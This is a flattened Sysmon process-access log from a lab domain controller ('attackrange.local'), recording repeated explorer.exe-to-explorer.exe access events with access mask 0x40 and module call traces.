16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 